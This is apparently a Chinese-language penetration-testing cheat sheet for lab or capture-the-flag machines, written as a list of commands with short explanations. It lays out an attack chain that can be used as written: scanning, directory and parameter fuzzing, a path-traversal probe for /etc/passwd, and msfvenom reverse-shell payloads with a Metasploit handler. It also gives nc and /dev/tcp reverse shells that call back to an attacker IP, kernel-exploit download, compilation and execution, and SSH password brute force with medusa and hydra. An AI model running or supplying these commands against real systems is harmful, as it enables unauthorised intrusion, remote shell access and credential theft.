1.IP搜寻

查看kali网段：      ip addr 、 ifconfig

namp：nmap -sP xxx.xxx.xxx.0/24

netdiscover：netdiscover  xxx.xxx.xxx.0/24

arp：arp-scan -l

2.端口扫描

粗略扫描：nmap <IP>

深度扫描：

nmap -A -p- <IP>

nmap -T4 -A -v <IP>

3.指纹探测

whatweb <url>

cmseek -u <url>

4.目录扫描

gobuster

gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b '403,404'

dirb

dirb <url>

dirb <url> -x .php,.zip,.txt,.html  等

5.参数探测

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZ=index.php

wfuzz -c -u http://192.168.110.131/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt -H "Cookie:PHPSESSID=l5r7estpbj5rrcfapfdhun8v6p"

6.msf木马文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.232.152 LPORT=7777  -o mshell.php

修改上述的php，生成不同的文件马

生成java jsp木马:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > breach.war

木马使用

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 4444
run

linux

/etc/passwd：存放相关用户信息

/etc/knock.conf：ssh保护机制knock的配置文件

/etc/*-release：查看操作系统

sudo -l

查看可以以root权限执行的文件和命令

查看内核

uname -a、uname -rms、hostnamectl

find

find / -name "xxx" 2>/dev/null

su

su user

ls -a

查看所有文件及其相关权限

ssh

ssh user@ip

md5加密

md5加密
echo -n "ippsec" | md5sum
转为十六进制
echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 |tr -d ' ' |tr -d '\n'| od -An -t x1：管道 (|) 将 echo 输出的内容传递给 od（octal dump）命令。-An 参数表示不打印地址，-t x1 表示以十六进制形式输出每个字节。
| tr -d ' '：tr（translate）命令用于删除指定字符，这里的 -d ' ' 表示删除所有空格。
| tr -d '\n'：再次使用 tr 命令删除所有的换行符（\n）。

openssl解密/加密

echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}key：密钥的十六进制转码

/etc/passwd的用户密码(admin)编译

 openssl passwd -1 -salt admin admin
-1 #使用md5加密算法
-salt #自动锚入一个随机参数作为文件内容加密

kali批量处理指令

 for i in $(cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $i;done

python交互性shell

python -c 'import pty;pty.spawn("/bin/bash")'

 反弹shell

nc -e /bin/bash 192.168.110.129 5555

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1 

 exp查询

内核提权：searchsploit privilege | grep CentOS     (管理系统)

searchexploit   xxx

search xxx

内核提权.1

拿到了xxx.c

gcc编译并另存：gcc xxx.c -o yf

(未'shell'之前)msf upload：upload ~/yf ./yf

赋权：chmod +x yf

执行：./yf

 内核提权.2

找到xxx.c

放在网站目录：cp xxx.c /var/www/html

kali开启apache服务：service apache2 start

wget下载：wget http:<kali ip>/xxx.c

 赋权：chmod 777 xxx.c

 gcc编译：gcc xxx.c -o xxx

执行：./xxx

./keystore结合pcap(.p12)文件

keytool -importkeystore -srckeystore <keystore的文件名> -destkeystore 文件名.p12 -deststoretype pkcs12 -srcalias tomcat

string

strings bill.png

knock敲门

knock 192.168.110.131 7469 8475 9842

端口监听

nc -lvp 5555

ssh密码爆破

medusa

medusa -M ssh -h 192.168.0.131 -u flag4 -P /usr/share/john/password.lst -e ns -F

hydra

echo 'flag4'>admin.txt
hydra -L admin.txt -P /usr/share/john/password.lst 192.168.0.131 ssh